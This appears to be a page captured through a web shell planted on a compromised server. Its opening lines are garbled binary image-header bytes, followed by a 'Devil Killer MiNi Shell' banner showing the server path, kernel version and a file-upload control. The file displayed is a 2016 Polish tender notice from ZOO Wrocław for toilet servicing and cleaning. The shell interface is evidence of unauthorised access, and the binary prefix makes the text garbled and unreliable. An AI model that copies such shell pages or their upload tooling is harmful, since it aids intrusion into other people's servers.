JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160226/43276-N-2016.html

<p class="kh_header"><b>Wrocław: OBSŁUGA I EKSPLOATACJA TOALET DLA ZWIEDZAJĄCYCH, ZLOKALIZOWANYCH NA TERENIE ZOO WROCŁAW SP. Z O.O. ORAZ UTRZYMANIE CZYSTOŚCI W PAWILONIE PN: KLIMAT, ZWIERZĘTA, LUDZIE  I SZKLANEGO OGRODZENIA PRZY WEJŚCIU GŁÓWNYM DO ZOO</b><br>
<b>Numer ogłoszenia: 43276 - 2016; data zamieszczenia: 26.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> ZOO Wrocław Sp. z o. o. , ul. Wróblewskiego 1-5, 51-618 Wrocław, woj. dolnośląskie, tel. 71 3483024, faks 71 3483768.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoo.wroclaw.bip-e.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OBSŁUGA I EKSPLOATACJA TOALET DLA ZWIEDZAJĄCYCH, ZLOKALIZOWANYCH NA TERENIE ZOO WROCŁAW SP. Z O.O. ORAZ UTRZYMANIE CZYSTOŚCI W PAWILONIE PN: KLIMAT, ZWIERZĘTA, LUDZIE  I SZKLANEGO OGRODZENIA PRZY WEJŚCIU GŁÓWNYM DO ZOO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
- obsługa i eksploatacja czterech  toalet  dla zwiedzających (szczegółowo określonych poniżej)   zlokalizowanych na   terenie ZOO Wrocław  Sp. z o.o. 
- utrzymanie czystości pawilonu pn:  Klimat, Zwierzęta, Ludzie,
- utrzymanie czystości szklanego ogrodzenia  przy wejściu głównym do ZOO 
  Wrocław Sp. z o.o. 

CPV:  	90600000-3  - usługi sprzątania oraz usługi sanitarne na obszarach        miejskich lub wiejskich oraz usługi powiązane

2.	 Wykaz toalet objętych przedmiotowym zamówieniem: 

TOALETA nr 1 (przy bramie głównej)
Kubatura				297,30m3
Powierzchnia użytkowa	  	 99,10 m2
Zestawienie pomieszczeń
Nazwa pomieszczenia		powierzchnia 		rodzaj posadzki		ilość urządzeń
Przedsionek			       30,65 m2		        artbeton				
Pomieszczenie gospodarcze	        6,62 m2		artbeton				
WC dla kobiet			      20,37 m2		artbeton		6 kabin
Umywalnia dla kobiet		      12,16 m2		artbeton		6 umywalek
WC dla mężczyzn		              15,71 m2	        artbeton		5 kabin, 4 pisuary
Umywalnia dla mężczyzn	        8,58 m2		artbeton		4 umywalki
WC dla niepełnosprawnych	        4,97 m2		artbeton		1 kabina, 1 umywalka,
                                                      		1 przewijak dla dzieci

TOALETA nr 2 (przy pawilonie drapieżnych)
Kubatura				410,00 m3
Powierzchnia użytkowa	  	 85,00 m2
Zestawienie pomieszczeń
Nazwa pomieszczenia			powierzchnia 	rodzaj posadzki	ilość urządzeń
Przedsionek (x2)		      	        23,8 m2		płytki ceramiczne	8 umywalek
Pomieszczenie gospodarcze	       	 8,2 m2		płytki ceramiczne
WC dla kobiet			     	24,8 m2		płytki ceramiczne	8 kabin	
WC dla kobiet	niepełnosprawnych  	  4,8 m2		płytki ceramiczne	1 kabina, 1 umywalka
WC dla mężczyzn		     	18,4 m2		płytki ceramiczne	3 kabiny, 6 pisuarów
WC dla mężczyzn niepełnosprawnych      4,8 m2		płytki ceramiczne	1 kabina, 1 umywalk                                                                                                             Punkt przewijania niemowląt

TOALETA nr 3 (w budynku terrarium)
Kubatura			     288,00 m3
Powierzchnia użytkowa	       71,00 m2
Zestawienie pomieszczeń
Nazwa pomieszczenia			powierzchnia 	rodzaj posadzki		ilość urządzeń
Przedsionek (x2)		            24,4 m2	płytki ceramiczne	4 umywalki
Pomieszczenie gospodarcze	             8,8 m2		płytki ceramiczne
WC dla kobiet			           16,4 m2		płytki ceramiczne	3 kabiny
WC dla mężczyzn		           21,4 m2		płytki ceramiczne	2 kabiny, 2 pisuary 
Punkt przewijania niemowląt

TOALETA nr 4 (obiekt wolnostojący w pobliżu pawilonu Madagaskaru)
Kubatura				516,00 m3
Powierzchnia użytkowa		110,00 m2
Zestawienie pomieszczeń
Nazwa pomieszczenia			powierzchnia 	rodzaj posadzki		ilość urządzeń
Podcień wejściowy (x2)	       		8,8 m2		płytki typu gres			
Pomieszczenie obsługi	       		9,9 m2		wykładzina dywanowa
Pomieszczenie gospodarcze	   	4,7 m2		płytki typu gres 
Umywalnie (x2)		     		15,8 m2		płytki typu gres		8 umywalek
WC dla kobiet			 	31,8 m2		płytki typu gres		10 kabin
WC dla mężczyzn		 	31,8 m2		płytki typu gres		4 kabiny, 10 pisuarów
WC dla kobiet niepełnosprawnych	7,2 m2		płytki typu gres		1 kabina, 1 umywalka
WC dla mężczyzn niepełnosprawnych	7,2 m2		płytki typu gres		1 kabina, 1 umywalka
Punkt przewijania niemowląt


2.1. Do obowiązków Wykonawcy w zakresie obsługi toalet należeć będzie: 
a)	bezpłatne udostępnienie zwiedzającym urządzeń WC (kabiny, pisuary) i sanitarnych (umywalki, punkty przewijania niemowląt), 
b)	utrzymanie czystości i porządku oraz pełnej sprawności technicznej zgodnie 
z wymogami higienicznymi i sanitarnymi w pomieszczeniach toalet oraz ich najbliższym otoczeniu, w tym realizowanie w uzgodnieniu z ZOO zaleceń pokontrolnych Państwowego Inspektora Sanitarnego, 
c)	dbanie o należyty stan techniczny urządzeń i całego obiektu włącznie 
z zabezpieczeniem w okresie zimowym instalacji wodociągowej, usuwaniem śniegu oraz likwidowaniem oblodzenia chodników w najbliższym otoczeniu toalet, zgodnie 
z obowiązującymi przepisami
d)	bieżące zaopatrzenie obiektów w środki higieny (papier toaletowy, ręczniki, mydło, preparaty do dezynfekcji itp.). 
e)	niezwłoczne informowanie Zamawiającego o konieczności dokonania niezbędnych napraw oraz bieżącej konserwacji obiektu i znajdujących się w nim urządzeń, np. wymiana rozbitej umywalki, naprawa wyłamanych drzwi, wymiana rozbitej szyby, naprawa cieknących kranów, spłuczek, wymiana oświetlenia itp., oraz informowanie w miarę możliwości o osobach, które przyczyniły się do powstania szkód w wyposażeniu toalet.
f)	zgłaszanie Zamawiającemu potrzeby wykonania napraw i remontów innych niż wynikają ze Specyfikacji Istotnych Warunków Zamówienia, 
g)	składowanie odpadów komunalnych w miejscu uzgodnionym z Zamawiającym, 
h)	przekazywanie kluczy od toalet na okres nocny pracownikom ochrony ZOO (portiernia) i pobieranie ich rano
i)	prowadzenie monitoringu (grafiku dziennego) obsługi poprzez wpisywanie się na listę w poszczególnych toaletach przy otwarciu i zamknięciu toalety oraz w czasie, gdy toaleta jest czynna, z częstotliwością co najmniej co 1 godzinę. 

2.2. Wykonawca we własnym zakresie prowadzić będzie sprawy zatrudnienia osób do  
      obsługi toalet,  z zastrzeżeniem aby przynajmniej  jedna osoba obsługiwała nie więcej       niż dwie toalety   
2.3. Zamawiający zapewni Wykonawcy nieodpłatnie energię elektryczną, wodę, 
      ogrzewanie, kanalizację, wywóz śmieci, bieżące wykonywanie koniecznych napraw  i wymiany wyposażenia toalet.
2.4.  a) Toalety winny być czynne w godzinach zwiedzania ZOO, to jest: 
	w okresie od 01 kwietnia do 30 września  od 09:00 do 18:00 (w weekendy i święta do 19:00) 
	w okresie od 01 października do 31 października  od 09:00 do 17:00  
	w okresie od 01 listopada do 28/29 lutego  od 09:00 do 16:00 
	w okresie od 01 marca do 31 marca  od 09:00 do 17:00  
b)  Toaleta nr 1 winna być czynna o 1 godzinę dłużej w stosunku do godzin zakończenia  zwiedzania podanych w punkcie a) oraz w piątki, soboty i niedziele w okresie od  01 listopada do 28/29 lutego do godziny 20.00
c) )  Toaleta nr 2 winna być czynna o 1 godzinę dłużej w stosunku do godzin 
        zakończenia zwiedzania podanych w punkcie a)
d)  Toaleta nr 4 w  okresie od 01 listopada do 28/29 lutego będzie nieczynna.
e)  Dopuszcza się wydłużenie ww. godzin na podstawie decyzji Zamawiającego podejmowanej na bieżąco
2.5. Prognozowana liczba zwiedzających (przy założeniu dużego zróżnicowania dziennego): 
	w okresie od 01 kwietnia do 30 czerwca 500.000 osób
	w okresie od 01 lipca do 30 września  500.000 osób
	w okresie od 01 października do 31 grudnia  250.000 osób
	w okresie od 01 stycznia do 31 marca  250.000 osób
2.6. Przekazanie toalet Wykonawcy, jak również ich zwrot po zakończeniu wykonywania zamówienia nastąpi  na podstawie protokołu zdawczo-odbiorczego. Po zakończeniu wykonywania zamówienia Wykonawca zobowiązuje się zwrócić toalety w stanie nie pogorszonym w odniesieniu do stanu określonego protokółem zdawczo-odbiorczym sporządzonym podczas przekazania toalet Wykonawcy.



3. Pawilon  pn: Klimat, Zwierzęta, Ludzie jest obiektem zamkniętym o powierzchni posadzek betonowych wynoszącej 320m2 , niejednolitym wystroju powierzchni pionowych 
w kolorze białym oraz posiadającym wiele elementów wyposażenia, a w szczególności monitorów i ekranów dotykowych:
 ekran informacyjny (iglo)
 lornetki (iglo)
 stół z grami polarnymi (dotykowy)
 dwa monitory dotykowe ( stanowisko małe kroki wielkie zmiany)
 segregacja śmieci - dotykowy (kuchnia)
 ślad węglowy Quiz  - dotykowy (kuchnia)
 quiz eko przepisy  - dotykowy (kuchnia) 
 okno - ekran (kuchnia)
 telewizor (kuchnia)
 dwa pulpity z corianu (przy stanowisku Stacja Wostok oraz Klimatyzatory Ziemi).

3.1.Do obowiązków Wykonawcy w części dotyczącej utrzymania czystości w pawilonie należeć będzie:
a)	codzienne przygotowanie pawilonu na przyjęcie zwiedzających poprzez:
 odkurzanie, zamiatanie i mycie podłóg,
 ścieranie kurzu z monitorów,
 czyszczenie powierzchni szklanych,
 utrzymanie czystości pozostałych elementów oraz ścian,
 utrzymanie porządku przed wejściem do pawilonu
b)	okresowa konserwacja podłogi
c)	monitorowanie obiektu co dwie godziny i bieżące usuwanie szczególnych zabrudzeń jeżeli wystąpią
d)	zgłaszanie Zamawiającemu zauważonych uszkodzeń i awarii.
3.2.	Zamawiający zapewni Wykonawcy nieodpłatnie energię elektryczną, wodę i wywóz śmieci

4.	Szklane ogrodzenie przy wejściu głównym  do ZOO Wrocław składa się  
z zamontowanych w ramy płyt szklanych o wysokości 2,1 m i łącznej dwustronnej powierzchni 370m2 
4.1.  Do obowiązków Wykonawcy należeć będzie:
	bieżące, punktowe usuwanie pojawiających się zabrudzeń, szczególnie 
       pochodzenia organicznego,
	jeden raz w miesiącu -  obustronne, dokładne (ciśnieniowe) mycie powierzchni 
       szklanych i ram ogrodzenia
4.2.  Zamawiający zapewni Wykonawcy nieodpłatnie energię elektryczną oraz wodę.

5.	Wykonawca we własnym zakresie zapewni  wszelkie środki i sprzęt niezbędny do realizacji zamówienia

6. Zamawiający umożliwi   zainteresowanym, Wykonawcom zapoznanie się 
z miejscem świadczenia usług na terenie ZOO Wrocław Sp. z o.o. w dniu 01marca  2016 r., godz. 11.00. W celu dokonania wizji lokalnej  należy skontaktować się  
z Panem Bartłomiejem DROBNIKIEM  - Kierownikiem administracji pod
 nr telefonu  512 521 123.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenie zamówień uzupełniające do wysokości 20% zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2019.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy przystępując do przetargu  zobowiązani są do wniesienia wadium w wysokości 15.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje w sposób należyty co najmniej jedną usługę odpowiadającą swoim rodzaje i wartością przedmiotowi zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać polisę lub inny dokument potwierdzający ubezpieczenie od odpowiedzialności cywilnej kontraktowej i deliktowej  w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Zdolności oganizacyjne - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony przewidują możliwość dokonania zmiany zawartej Umowy w przypadku, gdy konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy, tj. spowodowanych:
1)	zmianą powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń lub ostatecznych aktów administracyjnych właściwych organów - w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień Umowy do zaistniałego stanu prawnego lub faktycznego,
2)	siłą wyższą - rozumianą jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony Umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej.
3)	Zamawiający zastrzega sobie prawo zmniejszenia zakresu świadczonych Usług i w związku z tym wynagrodzenia Wykonawcy, w przypadku: wystąpienia prac remontowych, inwestycyjnych, zmian organizacyjnych u Zamawiającego, wyłączenia pomieszczeń (budynków) z eksploatacji.
4)	Zmniejszenie wysokości wynagrodzenia należnego Wykonawcy w przypadku zaistnienia okoliczności, o których mowa w ust. 2 nastąpi proporcjonalnie do okresu wyłączenia wykonywania Usługi oraz zmniejszenia zakresu (powierzchni), na której wykonywana jest Usługa.
5)	Zamawiający poinformuje Wykonawcę o wystąpieniu okoliczności wskazanych w ust. 2 z  co najmniej dwu godzinnym  wyprzedzeniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
